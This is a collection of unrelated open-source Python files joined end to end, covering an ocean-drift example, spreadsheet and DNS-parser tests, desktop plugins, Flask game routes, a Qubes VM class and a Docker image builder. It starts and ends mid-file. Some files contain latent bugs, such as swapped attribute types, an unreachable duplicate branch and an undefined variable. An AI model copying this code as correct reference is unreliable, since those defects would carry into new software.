reader_norkyst = reader_netCDF_CF_generic.Reader(o.test_data_folder() +
    '16Nov2015_NorKyst_z_surface/norkyst800_subset_16Nov2015.nc')

#%%
# Landmask
reader_landmask = reader_global_landmask.Reader(
                    extent=[4.0, 5.5, 59.9, 61.2])

o.add_reader([reader_landmask, reader_norkyst])

#%%
# Seeding some particles
lons = np.linspace(4.4, 4.6, 10)
lats = np.linspace(60.0, 60.1, 10)
lons, lats = np.meshgrid(lons, lats)
lons = lons.ravel()
lats = lats.ravel()

#%%
# Seed oil elements on a grid at regular time interval
start_time = reader_norkyst.start_time
time_step = timedelta(hours=6)
num_steps = 10
for i in range(num_steps+1):
    o.seed_elements(lons, lats, radius=0, number=100,
                    time=start_time + i*time_step)

#%%
# Running model for 60 hours
o.run(steps=60*4, time_step=900, time_step_output=3600)

#%%
# Print and plot results
print(o)
o.animation(fast=True)

#%%
# .. image:: /gallery/animations/example_grid_time_0.gif

# Copyright (c) 2010-2015 openpyxl


# package imports
from openpyxl.reader.strings import read_string_table

from openpyxl.tests.helper import compare_xml


def test_read_string_table(datadir):
    datadir.join('reader').chdir()
    src = 'sharedStrings.xml'
    with open(src) as content:
        assert read_string_table(content.read()) == [
            'This is cell A1 in Sheet 1', 'This is cell G5']


def test_empty_string(datadir):
    datadir.join('reader').chdir()
    src = 'sharedStrings-emptystring.xml'
    with open(src) as content:
        assert read_string_table(content.read()) == ['Testing empty cell', '']


def test_formatted_string_table(datadir):
    datadir.join('reader').chdir()
    src = 'shared-strings-rich.xml'
    with open(src) as content:
        assert read_string_table(content.read()) == [
            'Welcome', 'to the best shop in town', "     let's play "]


def test_write_string_table(datadir):
    from openpyxl.writer.strings import write_string_table

    datadir.join("reader").chdir()
    table = ['This is cell A1 in Sheet 1', 'This is cell G5']
    content = write_string_table(table)
    with open('sharedStrings.xml') as expected:
        diff = compare_xml(content, expected.read())
        assert diff is None, diff

# simpleSound.py
# Plays audio files on Linux and Windows.
# Written Jan-2008 by Timothy Weber.
# Based on (reconstituted) code posted by Bill Dandreta at <http://www.velocityreviews.com/forums/t337346-how-to-play-sound-in-python.html>.

import platform

if platform.system().startswith('Win'):
    from winsound import PlaySound, SND_FILENAME, SND_ASYNC
elif platform.system().startswith('Linux'):
    from wave import open as waveOpen
    from ossaudiodev import open as ossOpen

    try:
        from ossaudiodev import AFMT_S16_NE
    except ImportError:
        if byteorder == "little":
            AFMT_S16_NE = ossaudiodev.AFMT_S16_LE
        else:
            AFMT_S16_NE = ossaudiodev.AFMT_S16_BE


def Play(filename):
    """Plays the sound in the given filename, asynchronously."""
    if platform.system().startswith('Win'):
        PlaySound(filename, SND_FILENAME|SND_ASYNC)
    elif platform.system().startswith('Linux'):
        try:
            s = waveOpen(filename,'rb')
            (nc,sw,fr,nf,comptype, compname) = s.getparams( )
            dsp = ossOpen('/dev/dsp','w')

            dsp.setparameters(AFMT_S16_NE, nc, fr)
            data = s.readframes(nf)
            s.close()
            dsp.write(data)
            dsp.close()
        except:
            pass

# -*- coding: utf-8 -*-
# Copyright 2011 Christoph Reiter <reiter.christoph@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.

import os
import sys

if os.name == "nt" or sys.platform == "darwin":
    from quodlibet.plugins import PluginNotSupportedError
    raise PluginNotSupportedError

import dbus

from quodlibet import _
from quodlibet import app
from quodlibet.qltk import Icons
from quodlibet.plugins.events import EventPlugin


def get_toplevel_xid():
    if app.window.get_window():
        try:
            return app.window.get_window().get_xid()
        except AttributeError:  # non x11
            pass
    return 0


class InhibitFlags(object):
    LOGOUT = 1
    USERSWITCH = 1 << 1
    SUSPEND = 1 << 2
    IDLE = 1 << 3


class SessionInhibit(EventPlugin):
    PLUGIN_ID = "screensaver_inhibit"
    PLUGIN_NAME = _("Inhibit Screensaver")
    PLUGIN_DESC = _("Prevents the GNOME screensaver from activating while"
                    " a song is playing.")
    PLUGIN_ICON = Icons.PREFERENCES_DESKTOP_SCREENSAVER

    DBUS_NAME = "org.gnome.SessionManager"
    DBUS_INTERFACE = "org.gnome.SessionManager"
    DBUS_PATH = "/org/gnome/SessionManager"

    APPLICATION_ID = "quodlibet"
    INHIBIT_REASON = _("Music is playing")

    __cookie = None

    def enabled(self):
        if not app.player.paused:
            self.plugin_on_unpaused()

    def disabled(self):
        if not app.player.paused:
            self.plugin_on_paused()

    def plugin_on_unpaused(self):
        xid = dbus.UInt32(get_toplevel_xid())
        flags = dbus.UInt32(InhibitFlags.IDLE)

        try:
            bus = dbus.SessionBus()
            obj = bus.get_object(self.DBUS_NAME, self.DBUS_PATH)
            iface = dbus.Interface(obj, self.DBUS_INTERFACE)
            self.__cookie = iface.Inhibit(
                self.APPLICATION_ID, xid, self.INHIBIT_REASON, flags)
        except dbus.DBusException:
            pass

    def plugin_on_paused(self):
        if self.__cookie is None:
            return

        try:
            bus = dbus.SessionBus()
            obj = bus.get_object(self.DBUS_NAME, self.DBUS_PATH)
            iface = dbus.Interface(obj, self.DBUS_INTERFACE)
            iface.Uninhibit(self.__cookie)
            self.__cookie = None
        except dbus.DBusException:
            pass

#!/usr/bin/env python
#
# testlibbind_ns_msg.py - Unit tests for the libbind ns_msg wrapper
#
# This file is part of Strangle.
#
# Strangle is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Strangle is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Strangle; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

import sys, testutils, random
import unittest

from Strangle import libbind

class ns_msgTestCase(unittest.TestCase):
    """Tests for the wrapper around the libbind ns_msg struct"""

    def test000Exists(self):
	"""Check that the ns_msg type object exists cleanly in the module"""
	assert(libbind.ns_msg.__class__ is type)

    def testInstantiate(self):
	"""Check that the ns_msg type accepts the correct arguments"""

	# Too few
	self.assertRaises(TypeError, libbind.ns_msg)

	# Too many
	self.assertRaises(TypeError, libbind.ns_msg, 'one', 'two')

    def testNoticeInvalid(self):
	"""Test whether the ns_msg type can handle bad data"""
	rng = testutils.rng
	
	for testNum in range(0, 50):
	    packetLength = random.randrange(20, 80)
	    packetVal    = rng.read(packetLength)
	    self.assertRaises(TypeError, libbind.ns_msg, packetVal)
    
    def testParseValidQuery(self):
	"""Test whether ns_msg initialization parses valid NS queries"""
	packetData = file("data/www.company.example-query").read()
	n = libbind.ns_msg(packetData)
	assert(type(n) is libbind.ns_msg)

    def testParseValidResponse(self):
	"""Test whether ns_msg initialization parses valid NS queries"""
	packetData = file("data/www.company.example-response").read()
	n = libbind.ns_msg(packetData)
	assert(type(n) is libbind.ns_msg)

def suite():
    s = unittest.TestSuite()
    s.addTest( unittest.makeSuite(ns_msgTestCase, 'test') )
    return s

if __name__ == "__main__":
    unittest.main()

#! /usr/bin/env python3

'''
given a list of stock price ticks for the day, can you tell me what
trades I should make to maximize my gain within the constraints of the
market? Remember - buy low, sell high, and you can't sell before you
buy.

Sample Input
19.35 19.30 18.88 18.93 18.95 19.03 19.00 18.97 18.97 18.98

'''

import argparse


def parse_args():
    parser = argparse.ArgumentParser(description='easy 249')
    parser.add_argument('stock_prices', action='store', nargs='+',
                        help='prices of a given stock')
    return parser.parse_args()


def stock(stock_prices):
    buy_day = 0
    max_profit = 0
    max_buy = 0
    max_sell = 0
    for buy_day in range(len(stock_prices) - 2):
        # maybe do a max(here)
        for sell_day in range(buy_day + 2, len(stock_prices)):
            profit = stock_prices[sell_day] - stock_prices[buy_day]
            if profit > max_profit:
                max_profit = profit
                max_buy = buy_day
                max_sell = sell_day
    print("max profit: %.2f from buy on day %d at %.2f sell on day %d at %.2f" %
          (max_profit, max_buy, stock_prices[max_buy], max_sell, stock_prices[max_sell]))


if __name__ == '__main__':
    args = parse_args()
    stock([float(price) for price in args.stock_prices])

################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
################################################################

import sys
import time

import logging
import jobmanager.io.agents as agents
import jobmanager.io.jobs as jobs

from jobmanager.config import Config
from peewee import fn

from liveq.models import Agent, AgentGroup, Jobs

# Setup logger
logger = logging.getLogger("teamqueue")

def processTeamQueue():
	"""
	This should be called periodically to check and schedule jobs pending for the
	particular team
	"""
	pass


import random
import time

from flask import (
    request,
    session,
    flash,
    redirect,
    url_for,
    Response,
    render_template,
)

from NossiPack.Cards import Cards
from NossiPack.User import Userlist
from NossiPack.VampireCharacter import VampireCharacter
from NossiPack.krypta import DescriptiveError
from NossiSite.base import app as defaultapp, log
from NossiSite.helpers import checklogin


def register(app=None):
    if app is None:
        app = defaultapp

    @app.route("/setfromsource/")
    def setfromsource():
        checklogin()
        source = request.args.get("source")
        ul = Userlist()
        u = ul.loaduserbyname(session.get("user"))
        try:
            new = VampireCharacter()
            if new.setfromdalines(source[-7:]):
                u.sheetid = u.savesheet(new)
                ul.saveuserlist()
                flash("character has been overwritten with provided Dalines sheet!")
            else:
                flash("problem with " + source)
        except Exception:
            log.exception("setfromsource:")
            flash(
                "Sorry "
                + session.get("user").capitalize()
                + ", I can not let you do that."
            )
        return redirect(url_for("charsheet"))

    @app.route("/timetest")
    def timetest():
        return str(time.time())

    @app.route("/boardgame<int:size>_<seed>.json")
    @app.route("/boardgame<int:size>_.json")
    def boardgamemap(size, seed=""):
        if size > 100:
            size = 100
        rx = random.Random()
        if seed:
            rx.seed(str(size) + str(seed))

        def r(a=4):
            for _ in range(a):
                yield rx.randint(1, 10)

        def e(inp, dif):
            for i in inp:
                yield 2 if i == 10 else (1 if i >= dif else 0)

        def fpik(inp, pref="FPIK"):
            vals = list(inp)
            vals = [(v if v != 2 else (2 if sum(vals) < 4 else 1)) for v in vals]
            for i, p in enumerate(pref):
                yield '"' + p + '": ' + str(vals[i])

        def cell():  # i, j):
            difficulty = 8
            """6 + (
                (9 if i == j else
                 8)
                if i in [0, size - 1] and j in [0, size - 1] else
                (7 if j in [0, size - 1] else
                 (6 if j % 2 == 1 and (i in [0, size - 1] or j in [0, size - 1]) else
                  (5 if 0 < i < size - 1 else 8))))"""

            for li in fpik(e(r(), difficulty)):
                yield li

        first = True

        def notfirst():
            nonlocal first
            if first:
                first = False
                return True
            return False

        def resetfirst():
            nonlocal first
            first = True

        def generate():
            yield '{"board": ['
            for x in range(size):
                yield ("," if not first else "") + "["
                resetfirst()
                for y in range(size):
                    yield ("" if notfirst() else ",") + '{ "x":%d, "y":%d, ' % (
                        x,
                        y,
                    ) + ",".join(
                        cell(
                            # x, y
                        )
                    ) + "}"
                yield "]"
            yield "]}"

        return Response(generate(), mimetype="text/json")

    @app.route("/gameboard/<int:size>/")
    @app.route("/gameboard/<int:size>/<seed>")
    def gameboard(size, seed=""):
        if size > 20:
            size = 20
        return render_template("gameboard.html", size=size, seed=seed)

    @app.route("/chargen/standard")
    def standardchar():
        return redirect(
            url_for("chargen", a=3, b=5, c=7, abia=5, abib=9, abic=13, shuffle=1)
        )

    @app.route("/cards/", methods=["GET"])
    @app.route("/cards/<command>", methods=["POST", "GET"])
    def cards(command: str = None):
        checklogin()
        deck = Cards.getdeck(session["user"])
        try:
            if request.method == "GET":
                if command is None:
                    return deck.serialized_parts
            elif request.method == "POST":
                par = request.get_json()["parameter"]
                if command == "draw":
                    return {"result": list(deck.draw(par))}
                elif command == "spend":
                    return {"result": list(deck.spend(par))}
                elif command == "returnfun":
                    return {"result": list(deck.pilereturn(par))}
                elif command == "dedicate":
                    if ":" not in par:
                        par += ":"
                    return {"result": list(deck.dedicate(*par.split(":", 1)))}
                elif command == "remove":
                    return {"result": list(deck.remove(par))}
                elif command == "free":
                    message = deck.undedicate(par)
                    for m in message:
                        flash("Affected Dedication: " + m)
                        return {"result": "ok", "messages": list(message)}
                elif command == "free":
                    affected, message = deck.free(par)
                    for m in message:
                        flash("Affected Dedication: " + m)
                    return {
                        "result": list(affected),
                        "messages": message,
                    }
                else:
                    return {"result": "error", "error": f"invalid command {command}"}

            return render_template("cards.html", cards=deck)
        except DescriptiveError as e:
            return {"result": "error", "error": e.args[0]}
        except TypeError:
            return {"result": "error", "error": "Parameter is not in a valid Format"}
        finally:
            Cards.savedeck(session["user"], deck)

    @app.route("/chargen", methods=["GET", "POST"])
    def chargen_menu():
        if request.method == "POST":
            f = dict(request.form)
            if not f.get("vampire", None):
                return redirect(
                    url_for(
                        "chargen",
                        a=f["a"],
                        b=f["b"],
                        c=f["c"],
                        abia=f["abia"],
                        abib=f["abib"],
                        abic=f["abic"],
                        shuffle=1 if f.get("shuffle", 0) else 0,
                    )
                )
            return redirect(
                url_for(
                    "chargen",
                    a=f["a"],
                    b=f["b"],
                    c=f["c"],
                    abia=f["abia"],
                    abib=f["abib"],
                    abic=f["abic"],
                    shuffle=1 if f["shuffle"] else 0,
                    vamp=f["discipline"],
                    back=f["back"],
                )
            )
        return render_template("generate_dialog.html")

    @app.route("/chargen/<a>,<b>,<c>,<abia>,<abib>,<abic>,<shuffle>")
    @app.route("/chargen/<a>,<b>,<c>,<abia>,<abib>,<abic>,<shuffle>,<vamp>,<back>")
    def chargen(a, b, c, abia, abib, abic, shuffle, vamp=None, back=None):
        """
        Redirects to the charactersheet/ editor(if logged in) of a randomly
        generated character
        :param a: points to be allocated in the first attribute group
        :param b: points to be allocated in the second attribute group
        :param c: points to be allocated in the third attribute group
        :param abia: points to be allocated in the first ability group
        :param abib: points to be allocated in the second ability group
        :param abic: points to be allocated in the third ability group
        :param shuffle: if the first/second/third groups should be shuffled (each)
        :param vamp: if not None, character will be a vampire, int(vamp)
        is the amount of discipline points
        :param back:  background points
        """
        try:
            char = VampireCharacter.makerandom(
                1,
                5,
                int(a),
                int(b),
                int(c),
                int(abia),
                int(abib),
                int(abic),
                int(shuffle),
            )
            print(vamp)
            if vamp is not None:
                char.makevamprandom(vamp, back)
            print(char.getdictrepr())
            if session.get("logged_in", False):
                return render_template(
                    "vampsheet_editor.html",
                    character=char.getdictrepr(),
                    Clans=VampireCharacter.get_clans(),
                    Backgrounds=VampireCharacter.get_backgrounds(),
                    New=True,
                )
            return render_template("vampsheet.html", character=char.getdictrepr())
        except Exception as e:
            flash("ERROR" + "\n".join(e.args))
            raise

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008-2010 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.

"""Contains the AutoCompletor class."""

import gobject
import re
try:
    from collections import defaultdict
except ImportError:
    class defaultdict(dict):
        def __init__(self, default_factory=lambda: None):
            self.__factory = default_factory

        def __getitem__(self, key):
            if key in self:
                return super(defaultdict, self).__getitem__(key)
            else:
                return self.__factory()

from virtaal.controllers.baseplugin import BasePlugin
from virtaal.views.widgets.textbox import TextBox


class AutoCompletor(object):
    """
    Does auto-completion of registered words in registered widgets.
    """

    wordsep_re = re.compile(r'\W+', re.UNICODE)

    MAX_WORDS = 10000
    DEFAULT_COMPLETION_LENGTH = 4 # The default minimum length of a word that may
                                  # be auto-completed.

    def __init__(self, main_controller, word_list=[], comp_len=DEFAULT_COMPLETION_LENGTH):
        """Constructor.

            @type  word_list: iterable
            @param word_list: A list of words that should be auto-completed."""
        self.main_controller = main_controller
        assert isinstance(word_list, list)
        self.comp_len = comp_len
        self._word_list = []
        self._word_freq = defaultdict(lambda: 0)
        self.add_words(word_list)
        self.widgets = set()

    def add_widget(self, widget):
        """Add a widget to the list of widgets to do auto-completion for."""
        if widget in self.widgets:
            return # Widget already added

        if isinstance(widget, TextBox):
            self._add_text_box(widget)
            return

        raise ValueError("Widget type %s not supported." % (type(widget)))

    def add_words(self, words, update=True):
        """Add a word or words to the list of words to auto-complete."""
        for word in words:
            if self.isusable(word):
                self._word_freq[word] += 1
        if update:
            self._update_word_list()

    def add_words_from_units(self, units):
        """Collect all words from the given translation units to use for
            auto-completion.

            @type  units: list
            @param units: The translation units to collect words from.
            """
        for unit in units:
            target = unit.target
            if not target:
                continue
            self.add_words(self.wordsep_re.split(target), update=False)
            if len(self._word_freq) > self.MAX_WORDS:
                break

        self._update_word_list()

    def autocomplete(self, word):
        for w in self._word_list:
            if w.startswith(word):
                return w, w[len(word):]
        return None, u''

    def clear_widgets(self):
        """Release all registered widgets from the spell of auto-completion."""
        for w in set(self.widgets):
            self.remove_widget(w)

    def clear_words(self):
        """Remove all registered words; effectively turns off auto-completion."""
        self._word_freq = []
        self._word_list = defaultdict(lambda: 0)

    def isusable(self, word):
        """Returns a value indicating if the given word should be kept as a
        suggestion for autocomplete."""
        return len(word) > self.comp_len + 2

    def remove_widget(self, widget):
        """Remove a widget (currently only L{TextBox}s are accepted) from
            the list of widgets to do auto-correction for.
            """
        if isinstance(widget, TextBox) and widget in self.widgets:
            self._remove_textbox(widget)

    def remove_words(self, words):
        """Remove a word or words from the list of words to auto-complete."""
        if isinstance(words, basestring):
            del self._word_freq[words]
            self._word_list.remove(words)
        else:
            for w in words:
                try:
                    del self._word_freq[w]
                    self._word_list.remove(w)
                except KeyError:
                    pass

    def _add_text_box(self, textbox):
        """Add the given L{TextBox} to the list of widgets to do auto-
            correction on."""
        if not hasattr(self, '_textbox_insert_ids'):
            self._textbox_insert_ids = {}
        handler_id = textbox.connect('text-inserted', self._on_insert_text)
        self._textbox_insert_ids[textbox] = handler_id
        self.widgets.add(textbox)

    def _on_insert_text(self, textbox, text, offset, elem):
        if not isinstance(text, basestring) or self.wordsep_re.match(text):
            return
        # We are only interested in single character insertions, otherwise we
        # react similarly for paste and similar events
        if len(text.decode('utf-8')) > 1:
            return

        prefix = unicode(textbox.get_text(0, offset) + text)
        postfix = unicode(textbox.get_text(offset))
        buffer = textbox.buffer

        # Quick fix to check that we don't autocomplete in the middle of a word.
        right_lim = len(postfix) > 0 and postfix[0] or ' '
        if not self.wordsep_re.match(right_lim):
            return

        lastword = self.wordsep_re.split(prefix)[-1]

        if len(lastword) >= self.comp_len:
            completed_word, word_postfix = self.autocomplete(lastword)
            if completed_word == lastword:
                return

            if completed_word:
                # Updating of the buffer is deferred until after this signal
                # and its side effects are taken care of. We abuse
                # gobject.idle_add for that.
                insert_offset = offset + len(text)
                def suggest_completion():
                    textbox.handler_block(self._textbox_insert_ids[textbox])
                    #logging.debug("textbox.suggestion = {'text': u'%s', 'offset': %d}" % (word_postfix, insert_offset))
                    textbox.suggestion = {'text': word_postfix, 'offset': insert_offset}
                    textbox.handler_unblock(self._textbox_insert_ids[textbox])

                    sel_iter_start = buffer.get_iter_at_offset(insert_offset)
                    sel_iter_end   = buffer.get_iter_at_offset(insert_offset + len(word_postfix))
                    buffer.select_range(sel_iter_start, sel_iter_end)

                    return False

                gobject.idle_add(suggest_completion, priority=gobject.PRIORITY_HIGH)

    def _remove_textbox(self, textbox):
        """Remove the given L{TextBox} from the list of widgets to do
            auto-correction on.
            """
        if not hasattr(self, '_textbox_insert_ids'):
            return
        # Disconnect the "insert-text" event handler
        textbox.disconnect(self._textbox_insert_ids[textbox])

        self.widgets.remove(textbox)

    def _update_word_list(self):
        """Update and sort found words according to frequency."""
        wordlist = self._word_freq.items()
        wordlist.sort(key=lambda x:x[1], reverse=True)
        self._word_list = [items[0] for items in wordlist]


class Plugin(BasePlugin):
    description = _('Automatically complete long words while you type')
    display_name = _('AutoCompletor')
    version = 0.1

    # INITIALIZERS #
    def __init__(self, internal_name, main_controller):
        self.internal_name = internal_name
        self.main_controller = main_controller

        self._init_plugin()

    def _init_plugin(self):
        from virtaal.common import pan_app
        self.autocomp = AutoCompletor(self.main_controller)

        self._store_loaded_id = self.main_controller.store_controller.connect('store-loaded', self._on_store_loaded)

        if self.main_controller.store_controller.get_store():
            # Connect to already loaded store. This happens when the plug-in is enabled after loading a store.
            self._on_store_loaded(self.main_controller.store_controller)

        self._unitview_id = None
        unitview = self.main_controller.unit_controller.view
        if unitview.targets:
            self._connect_to_textboxes(unitview, unitview.targets)
        else:
            self._unitview_id = unitview.connect('targets-created', self._connect_to_textboxes)

    def _connect_to_textboxes(self, unitview, textboxes):
        for target in textboxes:
                self.autocomp.add_widget(target)

    # METHDOS #
    def destroy(self):
        """Remove all signal-connections."""
        self.autocomp.clear_words()
        self.autocomp.clear_widgets()
        self.main_controller.store_controller.disconnect(self._store_loaded_id)
        if getattr(self, '_cursor_changed_id', None):
            self.store_cursor.disconnect(self._cursor_changed_id)
        if self._unitview_id:
            self.main_controller.unit_controller.view.disconnect(self._unitview_id)


    # EVENT HANDLERS #
    def _on_cursor_change(self, cursor):
        def add_widgets():
            if hasattr(self, 'lastunit'):
                if self.lastunit.hasplural():
                    for target in self.lastunit.target:
                        if target:
                            #logging.debug('Adding words: %s' % (self.autocomp.wordsep_re.split(unicode(target))))
                            self.autocomp.add_words(self.autocomp.wordsep_re.split(unicode(target)))
                else:
                    if self.lastunit.target:
                        #logging.debug('Adding words: %s' % (self.autocomp.wordsep_re.split(unicode(self.lastunit.target))))
                        self.autocomp.add_words(self.autocomp.wordsep_re.split(unicode(self.lastunit.target)))
            self.lastunit = cursor.deref()
        gobject.idle_add(add_widgets)

    def _on_store_loaded(self, storecontroller):
        self.autocomp.add_words_from_units(storecontroller.get_store().get_units())

        if hasattr(self, '_cursor_changed_id'):
            self.store_cursor.disconnect(self._cursor_changed_id)
        self.store_cursor = storecontroller.cursor
        self._cursor_changed_id = self.store_cursor.connect('cursor-changed', self._on_cursor_change)
        self._on_cursor_change(self.store_cursor)

#
# The Qubes OS Project, http://www.qubes-os.org
#
# Copyright (C) 2014-2016  Wojtek Porczyk <woju@invisiblethingslab.com>
# Copyright (C) 2016       Marek Marczykowski <marmarek@invisiblethingslab.com>)
# Copyright (C) 2016       Bahtiar `kalkin-` Gadimov <bahtiar@gadimov.de>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see <https://www.gnu.org/licenses/>.
#

''' This module contains the TemplateVM implementation '''

import qubes
import qubes.config
import qubes.vm.qubesvm
import qubes.vm.mix.net
from qubes.config import defaults
from qubes.vm.qubesvm import QubesVM


class TemplateVM(QubesVM):
    '''Template for AppVM'''

    dir_path_prefix = qubes.config.system_path['qubes_templates_dir']

    @property
    def appvms(self):
        ''' Returns a generator containing all domains based on the current
            TemplateVM.
        '''
        for vm in self.app.domains:
            if hasattr(vm, 'template') and vm.template is self:
                yield vm

    netvm = qubes.VMProperty('netvm', load_stage=4, allow_none=True,
        default=None,
        # pylint: disable=protected-access
        setter=qubes.vm.qubesvm.QubesVM.netvm._setter,
        doc='VM that provides network connection to this domain. When '
            '`None`, machine is disconnected.')

    def __init__(self, *args, **kwargs):
        assert 'template' not in kwargs, "A TemplateVM can not have a template"
        self.volume_config = {
            'root': {
                'name': 'root',
                'snap_on_start': False,
                'save_on_stop': True,
                'rw': True,
                'source': None,
                'size': defaults['root_img_size'],
            },
            'private': {
                'name': 'private',
                'snap_on_start': False,
                'save_on_stop': True,
                'rw': True,
                'source': None,
                'size': defaults['private_img_size'],
                'revisions_to_keep': 0,
            },
            'volatile': {
                'name': 'volatile',
                'size': defaults['root_img_size'],
                'snap_on_start': False,
                'save_on_stop': False,
                'rw': True,
            },
            'kernel': {
                'name': 'kernel',
                'snap_on_start': False,
                'save_on_stop': False,
                'rw': False
            }
        }
        super(TemplateVM, self).__init__(*args, **kwargs)

    @qubes.events.handler('property-set:default_user',
                          'property-set:kernel',
                          'property-set:kernelopts',
                          'property-set:vcpus',
                          'property-set:memory',
                          'property-set:maxmem',
                          'property-set:qrexec_timeout',
                          'property-set:shutdown_timeout',
                          'property-set:management_dispvm')
    def on_property_set_child(self, _event, name, newvalue, oldvalue=None):
        """Send event about default value change to child VMs
           (which use default inherited from the template).

           This handler is supposed to be set for properties using
           `_default_with_template()` function for the default value.
           """
        if newvalue == oldvalue:
            return

        for vm in self.appvms:
            if not vm.property_is_default(name):
                continue
            vm.fire_event('property-reset:' + name, name=name)

# Copyright (C) 2005, Giovanni Bajo
# Based on previous work under copyright (c) 2001, 2002 McMillan Enterprises, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
import sys

def hook(mod):
    if sys.version[0] > '1':
        for i in range(len(mod.imports)-1, -1, -1):
            if mod.imports[i][0] == 'strop':
                del mod.imports[i]
    return mod

#!/usr/bin/env python3

import sys
import os
sys.path.append(os.path.realpath("."))

import unittest

import cleanstream
import tagger
import pretransfer
import transfer
import interchunk
import postchunk
import adaptdocx

if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    failures = 0
    for module in [tagger,
                   pretransfer,
                   transfer,
                   interchunk,
                   postchunk,
                   adaptdocx,
                   cleanstream]:
        suite = unittest.TestLoader().loadTestsFromModule(module)
        res = unittest.TextTestRunner(verbosity=2).run(suite)
        if(not(res.wasSuccessful())):
            failures += 1
    sys.exit(min(failures, 255))

#!/usr/bin/python3

# @begin:license
#
# Copyright (c) 2015-2019, Benjamin Niemann <pink@odahoda.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @end:license

import logging
import random

from . import ipc_test_pb2
from . import ipc_test

logger = logging.getLogger(__name__)


class IPCPerfTest(ipc_test.IPCPerfTestBase):
    async def test_small_messages(self):
        request = ipc_test_pb2.TestRequest()
        request.t.add(numerator=random.randint(0, 4), denominator=random.randint(1, 2))
        await self.run_test(request, 5000)

    async def test_large_messages(self):
        request = ipc_test_pb2.TestRequest()
        for _ in range(10000):
            request.t.add(numerator=random.randint(0, 4), denominator=random.randint(1, 2))
        await self.run_test(request, 100)

import glob
import fnmatch
import itertools
import logging
import os
import re
import six
import sys
import yaml

from .dockerfile import Dockerfile
from .image import ImageBuilder
from .config import Config


class Builder(object) :

    def __init__(self, config=None, **kwds) :
        self.logger = logging.getLogger(type(self).__name__)
        self.kwds = kwds
        self.images = {}
        if config is None:
            config = Config()
            config.update(dict(
                images= [
                    {
                        'path': 'docker/*',
                    }
                ],
            ))
        self.patterns = []
        for image in config['images']:
            # When path is provided and globbed, Dockerfile refers to its location
            # When path is provided but not globbed, Dockerfile refers to the current path
            # When Dockerfile is provided and globbed, path must not be globbed, both
            # refers to the current directory
            path = image.get('path', None)
            dockerfile = image.get('Dockerfile', 'Dockerfile')
            name = image.get('name', None)

            if path is None:
                path = '.'

            if '*' in path:
                if '*' in dockerfile:
                    raise ValueError('Ambiguity in your configuration for %r, globbing can'
                        'be done either in "Dockerfile" or "path" key but not both at the'
                        'same time' % image)

                dockerfile = os.path.join(path, dockerfile)
                path = re.compile(re.sub('^.*/([^*]*)$', r'(?P<path>.*)/\1', dockerfile))

            if name is None:
                name = dockerfile
            if '*' in name:
                start = re.sub('^([^*]*/|).*', r'^\1(?P<name>.*)', dockerfile)
                end = re.sub('^.*\*(?:|[^/]*)(/.*)$', r'\1$', dockerfile)
                name = re.compile(start + end)

            pattern = {
                'name': name,
                'path': path,
                'Dockerfile': dockerfile,
            }
            self.patterns.append(pattern)
        self.config = config

    def get_matching_pattern(self, pattern, name, path):
        pattern = pattern[name]
        if isinstance(pattern, six.string_types):
            return pattern
        else:
            match = pattern.match(path)
            if match:
                return match.group(name)
        return None
        

    def getImage(self, image_name):
        try:
            return self.images[image_name]
        except KeyError:
            self.logger.debug('image builder cache miss, try to find it')
            for img_cfg in self.patterns:
                for path in glob.glob(img_cfg['Dockerfile']):
                    found_image_name = self.get_matching_pattern(img_cfg, 'name', path)
